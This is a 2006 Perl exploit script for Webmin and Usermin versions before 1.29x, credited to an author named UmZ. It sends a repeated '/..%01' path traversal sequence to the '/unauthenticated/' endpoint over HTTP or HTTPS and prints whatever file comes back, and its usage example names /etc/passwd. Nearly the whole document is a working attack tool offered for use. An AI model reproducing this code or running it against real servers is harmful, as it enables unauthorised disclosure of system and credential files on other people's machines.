#!/usr/bin/perl # Exploit for WEBMIN and USERMIN less than 1.29x # ARBITARY REMOTE FILE DISCLOSURE # WORKS FOR HTTP AND HTTPS (NOW) # Thrusday 13th July 2006 # Vulnerability Disclosure at securitydot.net # Coded by UmZ! umz32.dll@gmail.com # # # # Make sure you have LWP before using this exploit. # USE IT AT YOUR OWN RISK # # GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................ # for other.. like AHMED n FAIZ ... (GET A LIFE MAN). # Revised on Friday 14th July 2006 use LWP::Simple; use LWP::UserAgent; my $userag = LWP::UserAgent->new; if (@ARGV < 4) { print("Usage: $0 \n"); print("TARGETS are\n "); print("0 - > HTTP \n"); print(" 1 - > HTTPS\n"); print("Define full path with file name \n"); print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n"); exit(1); } ($target, $port,$filename, $tar) = @ARGV; print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n"); print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n"); print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n"); print("Attacking $target on port $port!\n"); print("FILENAME: $filename\n"); $temp="/..%01" x 40; if ($tar == '0') { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; $content=get $url; print("\n FILE CONTENT STARTED"); print("\n -----------------------------------\n"); print("$content"); print("\n -------------------------------------\n"); } elsif ($tar == '1') { my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; my $req = HTTP::Request->new(GET => $url); my $res = $userag->request($req); if ($res->is_success) { print("FILE CONTENT STARTED\n"); print("-------------------------------------------\n"); print $res->as_string; print("-------------------------------------------\n"); } else { print "Failed: ", $res->status_line, "\n"; } }